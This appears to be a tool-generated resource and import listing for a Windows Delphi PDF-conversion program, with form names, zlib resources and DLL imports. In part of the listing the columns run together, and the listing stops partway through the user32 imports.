RT_RCDATA | 0x9f13d0 | 0xd57 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003221083455344
RT_RCDATA | 0x9f2128 | 0xc4e | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034920634920634
RT_RCDATA | 0x9f2d78 | 0xc4e | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034920634920634
RT_RCDATA | 0x9f39c8 | 0xcb5 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033814940055334
RT_RCDATA | 0x9f4680 | 0xcb0 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033866995073892
RT_RCDATA | 0x9f5330 | 0xd56 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032220269478618
RT_RCDATA | 0x9f6088 | 0xd47 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032362459546926
RT_RCDATA | 0x9f6dd0 | 0xdc2 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031232254400908
RT_RCDATA | 0x9f7b94 | 0xdc5 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031205673758865
RT_RCDATA | 0x9f895c | 0xcf3 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003318250377074
RT_RCDATA | 0x9f9650 | 0xced | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033242671501965
RT_RCDATA | 0x9fa340 | 0xda9 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031455533314269
RT_RCDATA | 0x9fb0ec | 0xda6 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031482541499714
RT_RCDATA | 0x9fbe94 | 0xcf3 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003318250377074
RT_RCDATA | 0x9fcb88 | 0xced | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033242671501965
RT_RCDATA | 0x9fd878 | 0x10 | data | | | 1.5
RT_RCDATA | 0x9fd888 | 0x148b | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0020916524054002
RT_RCDATA | 0x9fed14 | 0x111e | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025102692834322
RT_RCDATA | 0x9ffe34 | 0xd8c | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031718569780854
RT_RCDATA | 0xa00bc0 | 0x15e0 | data | | | 0.435
RT_RCDATA | 0xa021a0 | 0x2 | data | English | United States | 5.0
RT_RCDATA | 0xa021a4 | 0xe65a | Delphi compiled form 'Tfrm_About' | | | 0.9792606410039003
RT_RCDATA | 0xa10800 | 0x14c3 | Delphi compiled form 'Tfrm_Delete' | | | 0.34111006585136405
RT_RCDATA | 0xa11cc4 | 0x1233 | Delphi compiled form 'Tfrm_DOCtoPDF' | | | 0.35651427344923803
RT_RCDATA | 0xa12ef8 | 0x1bf1 | Delphi compiled form 'Tfrm_Encrypt' | | | 0.31553194463861317
RT_RCDATA | 0xa14aec | 0x1354 | Delphi compiled form 'Tfrm_Extract' | | | 0.34620048504446244
RT_RCDATA | 0xa15e40 | 0x5b8 | Delphi compiled form 'Tfrm_ExtractText' | | | 0.5095628415300546
RT_RCDATA | 0xa163f8 | 0x14e3 | Delphi compiled form 'Tfrm_ImagetoPDF' | | | 0.3596409201421358
RT_RCDATA | 0xa178dc | 0xf9e | Delphi compiled form 'Tfrm_Info' | | | 0.3114057028514257
RT_RCDATA | 0xa1887c | 0x157f | Delphi compiled form 'Tfrm_InsertMove' | | | 0.34217699436670906
RT_RCDATA | 0xa19dfc | 0xb88 | Delphi compiled form 'Tfrm_Key' | | | 0.8167344173441734
RT_RCDATA | 0xa1a984 | 0x17d53 | Delphi compiled form 'Tfrm_Main' | | | 0.4803368196764974
RT_RCDATA | 0xa326d8 | 0xf5a | Delphi compiled form 'Tfrm_Metadata' | | | 0.3697201017811705
RT_RCDATA | 0xa33634 | 0x4bb | Delphi compiled form 'Tfrm_Options' | | | 0.5136251032204789
RT_RCDATA | 0xa33af0 | 0x3b0 | Delphi compiled form 'Tfrm_Password' | | | 0.5720338983050848
RT_RCDATA | 0xa33ea0 | 0xf94 | Delphi compiled form 'Tfrm_PDFtoDOC' | | | 0.3688565697091274
RT_RCDATA | 0xa34e34 | 0xf61 | Delphi compiled form 'Tfrm_PDFtoImage' | | | 0.36423672847345695
RT_RCDATA | 0xa35d98 | 0xf64 | Delphi compiled form 'Tfrm_PDFtoPDF' | | | 0.3774111675126904
RT_RCDATA | 0xa36cfc | 0xf38 | Delphi compiled form 'Tfrm_PDFtoTXT' | | | 0.37217659137577
RT_RCDATA | 0xa37c34 | 0x4b1b | Delphi compiled form 'Tfrm_Preview' | | | 0.6656784729807043
RT_RCDATA | 0xa3c750 | 0x4bf | Delphi compiled form 'Tfrm_ProcessText' | | | 0.5242798353909465
RT_RCDATA | 0xa3cc10 | 0x1273 | Delphi compiled form 'Tfrm_Rename' | | | 0.3506246030065636
RT_RCDATA | 0xa3de84 | 0x1b20 | Delphi compiled form 'Tfrm_RotateCrop' | | | 0.2955069124423963
RT_RCDATA | 0xa3f9a4 | 0x354 | Delphi compiled form 'Tfrm_Search' | | | 0.5915492957746479
RT_RCDATA | 0xa3fcf8 | 0x24ae | Delphi compiled form 'Tfrm_Sign' | | | 0.24877529286474973
RT_RCDATA | 0xa421a8 | 0x1469 | Delphi compiled form 'Tfrm_Split' | | | 0.3508133971291866
RT_RCDATA | 0xa43614 | 0x5575 | Delphi compiled form 'Tfrm_Trial' | | | 0.8870046167207569
RT_RCDATA | 0xa48b8c | 0x14e6 | Delphi compiled form 'Tfrm_TXTtoPDF' | | | 0.37009345794392523
RT_RCDATA | 0xa4a074 | 0x978 | Delphi compiled form 'Tfrm_Update' | | | 0.7326732673267327
RT_RCDATA | 0xa4a9ec | 0x139f | Delphi compiled form 'Tfrm_Upgrade' | | | 0.4690424049372885
RT_RCDATA | 0xa4bd8c | 0x2a5d | Delphi compiled form 'Tfrm_Watermark' | | | 0.35813739050253574
RT_RCDATA | 0xa4e7ec | 0x2add | Delphi compiled form 'Tfrm_WatermarkNum' | | | 0.35477991433518635
RT_RCDATA | 0xa512cc | 0x2bdb | Delphi compiled form 'Tfrm_WatermarkText' | | | 0.35387904159615213
RT_RCDATA | 0xa53ea8 | 0x16ea | zlib compressed data | English | Australia | 1.001875213092397
RT_RCDATA | 0xa55594 | 0x560 | zlib compressed data | English | Australia | 1.0079941860465116
RT_RCDATA | 0xa55af4 | 0x1693 | zlib compressed data | English | Australia | 1.001903443502336
RT_RCDATA | 0xa57188 | 0x1721 | zlib compressed data | English | Australia | 1.0018577942915048
RT_RCDATA | 0xa588ac | 0x567 | zlib compressed data | English | Australia | 1.0079537237888647
                                                                                                      RT_RCDATA0xa58e140x55dzlib compressed dataEnglishAustralia1.0080116533139112
                                                                                                      RT_RCDATA0xa593740x1996zlib compressed dataEnglishAustralia1.0016793893129772
                                                                                                      RT_RCDATA0xa5ad0c0x6d5zlib compressed dataEnglishAustralia1.0062893081761006
                                                                                                      RT_RCDATA0xa5b3e40xb87zlib compressed dataEnglishAustralia1.0037275499830567
                                                                                                      RT_RCDATA0xa5bf6c0xa22zlib compressed dataEnglishAustralia1.0042405551272167
                                                                                                      RT_RCDATA0xa5c9900x6dfzlib compressed dataEnglishAustralia1.006253553155202
                                                                                                      RT_RCDATA0xa5d0700xa05zlib compressed dataEnglishAustralia1.0042884990253411
                                                                                                      RT_RCDATA0xa5da780x6d3zlib compressed dataEnglishAustralia1.0062965082999427
                                                                                                      RT_RCDATA0xa5e14c0xc96zlib compressed dataEnglishAustralia1.0024829298572315
                                                                                                      RT_RCDATA0xa5ede40x623zlib compressed dataEnglishAustralia1.0070019096117122
                                                                                                      RT_RCDATA0xa5f4080x16e5zlib compressed dataEnglishAustralia1.001876812830575
                                                                                                      RT_RCDATA0xa60af00x176fzlib compressed dataEnglishAustralia1.0018336389398232
                                                                                                      RT_RCDATA0xa622600x64dzlib compressed dataEnglishAustralia1.0068195908245505
                                                                                                      RT_RCDATA0xa628b00x642zlib compressed dataEnglishAustralia1.0068664169787764
                                                                                                      RT_RCDATA0xa62ef40x68czlib compressed dataEnglishAustralia1.0041766109785202
                                                                                                      RT_RCDATA0xa635800x6e3zlib compressed dataEnglishAustralia1.0062393647192285
                                                                                                      RT_RCDATA0xa63c640x6eazlib compressed dataEnglishAustralia1.0062146892655368
                                                                                                      RT_RCDATA0xa643500x713zlib compressed dataEnglishAustralia1.0060739922694644
                                                                                                      RT_RCDATA0xa64a640x71azlib compressed dataEnglishAustralia1.006050605060506
                                                                                                      RT_RCDATA0xa651800x71azlib compressed dataEnglishAustralia1.006050605060506
                                                                                                      RT_RCDATA0xa6589c0x71bzlib compressed dataEnglishAustralia1.006047278724574
                                                                                                      RT_RCDATA0xa65fb80x5bezlib compressed dataEnglishAustralia1.0074829931972789
                                                                                                      RT_RCDATA0xa665780x607zlib compressed dataEnglishAustralia1.0071289695398573
                                                                                                      RT_RCDATA0xa66b800x785zlib compressed dataEnglishAustralia1.0057142857142858
                                                                                                      RT_RCDATA0xa673080x783zlib compressed dataEnglishAustralia1.0041601664066562
                                                                                                      RT_RCDATA0xa67a8c0x856zlib compressed dataEnglishAustralia0.9915651358950328
                                                                                                      RT_RCDATA0xa682e40x87fzlib compressed dataEnglishAustralia0.9862068965517241
                                                                                                      RT_RCDATA0xa68b640x5d5zlib compressed dataEnglishAustralia1.0073677160080374
                                                                                                      RT_RCDATA0xa6913c0x5d7zlib compressed dataEnglishAustralia1.0073578595317725
                                                                                                      RT_RCDATA0xa697140x5e5zlib compressed dataEnglishAustralia1.0072895957587806
                                                                                                      RT_RCDATA0xa69cfc0x5eazlib compressed dataEnglishAustralia1.0072655217965654
                                                                                                      RT_RCDATA0xa6a2e80x6aczlib compressed dataEnglishAustralia1.006440281030445
                                                                                                      RT_RCDATA0xa6a9940x744zlib compressed dataEnglishAustralia1.0059139784946236
                                                                                                      RT_RCDATA0xa6b0d80x79czlib compressed dataEnglishAustralia0.9994866529774127
                                                                                                      RT_RCDATA0xa6b8740x5eezlib compressed dataEnglishAustralia1.0072463768115942
                                                                                                      RT_RCDATA0xa6be640x709zlib compressed dataEnglishAustralia1.0038867295946696
                                                                                                      RT_RCDATA0xa6c5700x704zlib compressed dataEnglishAustralia1.0011135857461024
                                                                                                      RT_RCDATA0xa6cc740xca6zlib compressed dataEnglishAustralia1.003397158739963
                                                                                                      RT_RCDATA0xa6d91c0x4f7zlib compressed dataEnglishAustralia1.008654602675059
                                                                                                      RT_RCDATA0xa6de140xcbfzlib compressed dataEnglishAustralia1.0033711308611708
                                                                                                      RT_RCDATA0xa6ead40x4f9zlib compressed dataEnglishAustralia1.0086410054988217
                                                                                                      RT_RCDATA0xa6efd00xff1zlib compressed dataEnglishAustralia0.9960793923058074
                                                                                                      RT_RCDATA0xa6ffc40x10f5zlib compressed dataEnglishAustralia0.9944713199723566
                                                                                                      RT_RCDATA0xa710bc0x961zlib compressed dataEnglishAustralia1.0045814244064972
                                                                                                      RT_RCDATA0xa71a200x4f3zlib compressed dataEnglishAustralia1.0086819258089976
                                                                                                      RT_RCDATA0xa71f140x755zlib compressed dataEnglishAustralia1.0
                                                                                                      RT_RCDATA0xa7266c0x481zlib compressed dataEnglishAustralia1.0095403295750216
                                                                                                      RT_RCDATA0xa72af00xd00zlib compressed dataEnglishAustralia1.0033052884615385
                                                                                                      RT_RCDATA0xa737f00x50bzlib compressed dataEnglishAustralia1.0085205267234703
                                                                                                      RT_RCDATA0xa73cfc0x496zlib compressed dataEnglishAustralia1.0093696763202726
                                                                                                      RT_RCDATA0xa741940x521zlib compressed dataEnglishAustralia1.0083777608530085
                                                                                                      RT_RCDATA0xa746b80x24e0zlib compressed dataEnglishAustralia1.0011652542372882
                                                                                                      RT_RCDATA0xa76b980x501zlib compressed dataEnglishAustralia1.0085870413739266
                                                                                                      RT_RCDATA0xa7709c0x89bzlib compressed dataEnglishAustralia0.9995460735360872
                                                                                                      RT_RCDATA0xa779380x568zlib compressed dataEnglishAustralia1.0079479768786128
                                                                                                      RT_RCDATA0xa77ea00x17cazlib compressed dataEnglishAustralia1.0018062397372742
                                                                                                      RT_RCDATA0xa7966c0x1856zlib compressed dataEnglishAustralia1.0017656500802568
                                                                                                      RT_RCDATA0xa7aec40x5cfzlib compressed dataEnglishAustralia1.007397444519166
                                                                                                      RT_RCDATA0xa7b4940x5c8zlib compressed dataEnglishAustralia1.0074324324324324
                                                                                                      RT_RCDATA0xa7ba5c0x7bdzlib compressed dataEnglishAustralia0.9919232710752145
                                                                                                      RT_RCDATA0xa7c21c0x537zlib compressed dataEnglishAustralia1.0082397003745318
                                                                                                      RT_RCDATA0xa7c7540x783zlib compressed dataEnglishAustralia0.9958398335933437
                                                                                                      RT_RCDATA0xa7ced80x535zlib compressed dataEnglishAustralia1.0082520630157539
                                                                                                      RT_RCDATA0xa7d4100x75abzlib compressed dataEnglishAustralia1.0004315639212562
                                                                                                      RT_RCDATA0xa849bc0x531zlib compressed dataEnglishAustralia1.0082768999247556
                                                                                                      RT_RCDATA0xa84ef00x8360zlib compressed dataEnglishAustralia0.904198382492864
                                                                                                      RT_RCDATA0xa8d2500x5cazlib compressed dataEnglishAustralia1.0074224021592442
                                                                                                      RT_RCDATA0xa8d81c0x75a1zlib compressed dataEnglishAustralia1.0005313319828646
                                                                                                      RT_RCDATA0xa94dc00x532zlib compressed dataEnglishAustralia1.0082706766917293
                                                                                                      RT_RCDATA0xa952f40x7cazlib compressed dataEnglishAustralia0.9944834503510531
                                                                                                      RT_RCDATA0xa95ac00x53azlib compressed dataEnglishAustralia1.008221225710015
                                                                                                      RT_RCDATA0xa95ffc0x45bazlib compressed dataEnglishAustralia0.9930532212885154
                                                                                                      RT_RCDATA0xa9a5b80x53bzlib compressed dataEnglishAustralia1.0082150858849888
                                                                                                      RT_RCDATA0xa9aaf40x4521zlib compressed dataEnglishAustralia0.9952534327852178
                                                                                                      RT_RCDATA0xa9f0180x537zlib compressed dataEnglishAustralia1.0082397003745318
                                                                                                      RT_RCDATA0xa9f5500x45cazlib compressed dataEnglishAustralia0.9933952759431323
                                                                                                      RT_RCDATA0xaa3b1c0x53dzlib compressed dataEnglishAustralia1.0082028337061895
                                                                                                      RT_RCDATA0xaa405c0x852zlib compressed dataEnglishAustralia1.003286384976526
                                                                                                      RT_RCDATA0xaa48b00x4f2zlib compressed dataEnglishAustralia1.0086887835703002
                                                                                                      RT_RCDATA0xaa4da40x4e5zlib compressed dataEnglishAustralia1.0087789305666401
                                                                                                      RT_RCDATA0xaa528c0x2220zlib compressed dataEnglishAustralia0.9892399267399268
                                                                                                      RT_RCDATA0xaa74ac0x4f6zlib compressed dataEnglishAustralia1.0086614173228345
                                                                                                      RT_RCDATA0xaa79a40x1f1fzlib compressed dataEnglishAustralia0.9870716706413958
                                                                                                      RT_RCDATA0xaa98c40x4f6zlib compressed dataEnglishAustralia1.0086614173228345
                                                                                                      RT_RCDATA0xaa9dbc0x15dczlib compressed dataEnglishAustralia1.001965689778413
                                                                                                      RT_RCDATA0xaab3980x4f7zlib compressed dataEnglishAustralia1.008654602675059
                                                                                                      RT_RCDATA0xaab8900x1523zlib compressed dataEnglishAustralia0.9955645906486786
                                                                                                      RT_RCDATA0xaacdb40x4f7zlib compressed dataEnglishAustralia1.008654602675059
                                                                                                      RT_RCDATA0xaad2ac0x18e5zlib compressed dataEnglishAustralia0.9937235211046603
                                                                                                      RT_RCDATA0xaaeb940x4f7zlib compressed dataEnglishAustralia1.008654602675059
                                                                                                      RT_RCDATA0xaaf08c0x24fbzlib compressed dataEnglishAustralia1.0011619309179254
                                                                                                      RT_RCDATA0xab15880x501zlib compressed dataEnglishAustralia1.0085870413739266
                                                                                                      RT_RCDATA0xab1a8c0xc79zlib compressed dataEnglishAustralia0.9004071406201065
                                                                                                      RT_RCDATA0xab27080x473zlib compressed dataEnglishAustralia1.009657594381036
                                                                                                      RT_RCDATA0xab2b7c0x4b5zlib compressed dataEnglishAustralia1.0091286307053942
                                                                                                      RT_RCDATA0xab30340x1262zlib compressed dataEnglishAustralia1.002337441563961
                                                                                                      RT_RCDATA0xab42980x51fzlib compressed dataEnglishAustralia1.0083905415713197
                                                                                                      RT_RCDATA0xab47b80x1219zlib compressed dataEnglishAustralia1.0023742715303259
                                                                                                      RT_RCDATA0xab59d40x78d2zlib compressed dataEnglishAustralia0.9838021338506304
                                                                                                      RT_RCDATA0xabd2a80x526zlib compressed dataEnglishAustralia1.0083459787556905
                                                                                                      RT_RCDATA0xabd7d00x51czlib compressed dataEnglishAustralia1.0084097859327217
                                                                                                      RT_RCDATA0xabdcec0x18d8zlib compressed dataEnglishAustralia0.9770440251572327
                                                                                                      RT_RCDATA0xabf5c40x18d6zlib compressed dataEnglishAustralia0.9767222396980182
                                                                                                      RT_RCDATA0xac0e9c0x51czlib compressed dataEnglishAustralia1.0084097859327217
                                                                                                      RT_RCDATA0xac13b80x523zlib compressed dataEnglishAustralia1.0083650190114068
                                                                                                      RT_RCDATA0xac18dc0x13abzlib compressed dataEnglishAustralia1.0021847070506456
                                                                                                      RT_RCDATA0xac2c880x521zlib compressed dataEnglishAustralia1.0083777608530085
                                                                                                      RT_RCDATA0xac31ac0x1a53zlib compressed dataEnglishAustralia1.0016322896572192
                                                                                                      RT_RCDATA0xac4c000x5f7zlib compressed dataEnglishAustralia1.0072036673215454
                                                                                                      RT_RCDATA0xac51f80x8b7zlib compressed dataEnglishAustralia0.9986553115194979
                                                                                                      RT_RCDATA0xac5ab00x56fzlib compressed dataEnglishAustralia1.0079079798705968
                                                                                                      RT_RCDATA0xac60200x4a4zlib compressed dataEnglishAustralia1.0092592592592593
                                                                                                      RT_RCDATA0xac64c40x1b4cazlib compressed dataEnglishAustralia0.9957430825090773
                                                                                                      RT_RCDATA0xae19900x502zlib compressed dataEnglishAustralia1.0085803432137286
                                                                                                      RT_RCDATA0xae1e940x172f7zlib compressed dataEnglishAustralia1.0003790790485116
                                                                                                      RT_RCDATA0xaf918c0x504zlib compressed dataEnglishAustralia1.0085669781931463
                                                                                                      RT_RCDATA0xaf96900x18748zlib compressed dataEnglishAustralia1.000409312355243
                                                                                                      RT_RCDATA0xb11dd80x50azlib compressed dataEnglishAustralia1.0085271317829458
                                                                                                      RT_RCDATA0xb122e40x17d19zlib compressed dataEnglishAustralia1.00036899990775
                                                                                                      RT_RCDATA0xb2a0000x509zlib compressed dataEnglishAustralia1.008533747090768
                                                                                                      RT_RCDATA0xb2a50c0x17542zlib compressed dataEnglishAustralia0.9973104213324403
                                                                                                      RT_RCDATA0xb41a500x553zlib compressed dataEnglishAustralia1.008070432868672
                                                                                                      RT_RCDATA0xb41fa40x13140zlib compressed dataEnglishAustralia1.0001535626535627
                                                                                                      RT_RCDATA0xb550e40x530zlib compressed dataEnglishAustralia1.0082831325301205
                                                                                                      RT_RCDATA0xb556140x142cbzlib compressed dataEnglishAustralia0.9997579718037152
                                                                                                      RT_RCDATA0xb698e00x13ce6zlib compressed dataEnglishAustralia0.9998397554421518
                                                                                                      RT_RCDATA0xb7d5c80x537zlib compressed dataEnglishAustralia1.0082397003745318
                                                                                                      RT_RCDATA0xb7db000xe4bczlib compressed dataEnglishAustralia0.9999316893230412
                                                                                                      RT_RCDATA0xb8bfbc0x4bdzlib compressed dataEnglishAustralia1.0090684253915911
                                                                                                      RT_RCDATA0xb8c47c0xa18zlib compressed dataEnglishAustralia1.0042569659442724
                                                                                                      RT_RCDATA0xb8ce940x9f8zlib compressed dataEnglishAustralia1.0043103448275863
                                                                                                      RT_RCDATA0xb8d88c0x11690zlib compressed dataEnglishAustralia1.0004347094458155
                                                                                                      RT_RCDATA0xb9ef1c0x917zlib compressed dataEnglishAustralia1.00472711645896
                                                                                                      RT_RCDATA0xb9f8340x1258fzlib compressed dataEnglishAustralia1.0004125028276403
                                                                                                      RT_RCDATA0xbb1dc40x968zlib compressed dataEnglishAustralia1.0045681063122924
                                                                                                      RT_RCDATA0xbb272c0x11b01zlib compressed dataEnglishAustralia1.000427887203412
                                                                                                      RT_RCDATA0xbc42300x94dzlib compressed dataEnglishAustralia1.004619907601848
                                                                                                      RT_RCDATA0xbc4b800x116c9zlib compressed dataEnglishAustralia1.0004343622581233
                                                                                                      RT_RCDATA0xbd624c0x919zlib compressed dataEnglishAustralia1.0047230571060541
                                                                                                      RT_RCDATA0xbd6b680x12600zlib compressed dataEnglishAustralia1.0004118835034013
                                                                                                      RT_RCDATA0xbe91680x96bzlib compressed dataEnglishAustralia1.0045624222314393
                                                                                                      RT_RCDATA0xbe9ad40x11b82zlib compressed dataEnglishAustralia1.0004271266775056
                                                                                                      RT_RCDATA0xbfb6580x951zlib compressed dataEnglishAustralia1.0046121593291404
                                                                                                      RT_RCDATA0xbfbfac0xa45zlib compressed dataEnglishAustralia1.00418410041841
                                                                                                      RT_RCDATA0xbfc9f40xa20zlib compressed dataEnglishAustralia1.0042438271604939
                                                                                                      RT_RCDATA0xbfd4140xa50zlib compressed dataEnglishAustralia1.0041666666666667
                                                                                                      RT_RCDATA0xbfde640x1254dzlib compressed dataEnglishAustralia1.0004128654191915
                                                                                                      RT_RCDATA0xc103b40x975zlib compressed dataEnglishAustralia1.0045435770342834
                                                                                                      RT_RCDATA0xc10d2c0x125cczlib compressed dataEnglishAustralia1.0004121682710205
                                                                                                      RT_RCDATA0xc232f80x978zlib compressed dataEnglishAustralia1.0045379537953796
                                                                                                      RT_RCDATA0xc23c700xe84dzlib compressed dataEnglishAustralia0.9976290167986682
                                                                                                      RT_RCDATA0xc324c00x52dzlib compressed dataEnglishAustralia1.008301886792453
                                                                                                      RT_RCDATA0xc329f00xc03czlib compressed dataEnglishAustralia1.0004267251889782
                                                                                                      RT_RCDATA0xc3ea2c0x520zlib compressed dataEnglishAustralia1.0083841463414633
                                                                                                      RT_RCDATA0xc3ef4c0xcb60zlib compressed dataEnglishAustralia1.0000960356484327
RT_RCDATA | 0xc4baac | 0x528 | zlib compressed data | English | Australia | 1.0083333333333333
RT_RCDATA | 0xc4bfd4 | 0xc70d | zlib compressed data | English | Australia | 1.0005102341189631
RT_RCDATA | 0xc586e4 | 0x528 | zlib compressed data | English | Australia | 1.0083333333333333
RT_RCDATA | 0xc58c0c | 0x563 | zlib compressed data | English | Australia | 1.0079767947788252
RT_RCDATA | 0xc59170 | 0x573 | zlib compressed data | English | Australia | 1.0078853046594982
RT_RCDATA | 0xc596e4 | 0x829e | zlib compressed data | English | Australia | 1.0006280279921047
RT_RCDATA | 0xc61984 | 0x1c46c | zlib compressed data | English | Australia | 0.924391296839924
RT_RCDATA | 0xc7ddf0 | 0x8011 | zlib compressed data | English | Australia | 0.9996949824614916
RT_RCDATA | 0xc85e04 | 0x85ce | zlib compressed data | English | Australia | 1.0006130670870554
RT_RCDATA | 0xc8e3d4 | 0xbec | color profile 2.0, RGB/XYZ-mntr device, 3052 bytes, 27-3-2009 21:37:45, 0x1 vendor attribute, relative colorimetric, 0xc95bd637e95d8a3b MD5 "sRGB IEC61966-2-1 no black scaling" | English | United States | 0.8502621231979031
RT_RCDATA | 0xc8efc0 | 0x6cdb | zlib compressed data | English | Southern Africa | 1.0005741558115333
RT_RCDATA | 0xc95c9c | 0x64b4 | zlib compressed data | English | Southern Africa | 0.9968968192397207
RT_GROUP_CURSOR | 0xc9c150 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0xc9c164 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xc9c178 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0xc9c18c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xc9c1a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xc9c1b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xc9c1c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xc9c1dc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0xc9c1f0 | 0x3e | data | English | United States | 0.8225806451612904
RT_VERSION | 0xc9c230 | 0x37c | data | English | United States | 0.46524663677130046
RT_MANIFEST | 0xc9c5ac | 0x6dc | XML 1.0 document, ASCII text, with CRLF line terminators | English | Great Britain | 0.3331435079726651
DLL | Import
mpr.dll | WNetEnumResourceW, WNetGetUniversalNameW, WNetCloseEnum, WNetOpenEnumW
winmm.dll | timeGetTime
shlwapi.dll | PathMatchSpecW, StrRetToStrW
FontSub.dll | CreateFontPackage
wininet.dll | InternetCloseHandle, InternetReadFile, InternetOpenW, InternetOpenUrlW, HttpQueryInfoW
winspool.drv | DocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
comdlg32.dll | ChooseFontW, GetSaveFileNameW, GetOpenFileNameW
comctl32.dll | FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, ImageList_GetDragImage, FlatSB_SetScrollProp, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
shell32.dll | SHBrowseForFolderW, SHBindToParent, DragQueryFileW, SHGetSpecialFolderLocation, ILCombine, Shell_NotifyIconW, SHCreateShellItem, SHGetDataFromIDListW, SHGetPathFromIDListW, ShellExecuteExW, ILFindLastID, ILGetNext, SHChangeNotifyDeregister, ILCreateFromPathW, ILFindChild, SHGetFileInfoW, SHGetDesktopFolder, ILRemoveLastID, ILFree, ILClone, IsUserAnAdmin, SHChangeNotification_Unlock, ShellExecuteW
user32.dll | CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoExW, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, SendDlgItemMessageW, IntersectRect, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, PtInRect, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, GetComboBoxInfo, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, wvsprintfA, GetSysColorBrush, GetWindowDC, DrawTextExW, CharLowerBuffA, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, IsRectEmpty, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, GetMenuItemRect, CreateIconIndirect, CreateWindowExW, ChildWindowFromPoint, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, MessageBoxA, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, OffsetRect, IsWindowUnicode, DispatchMessageW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, InflateRect, IsCharAlphaNumericA, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, TrackMouseEvent, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, EmptyClipboard, GetDlgItem, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, GetKeyboardState, 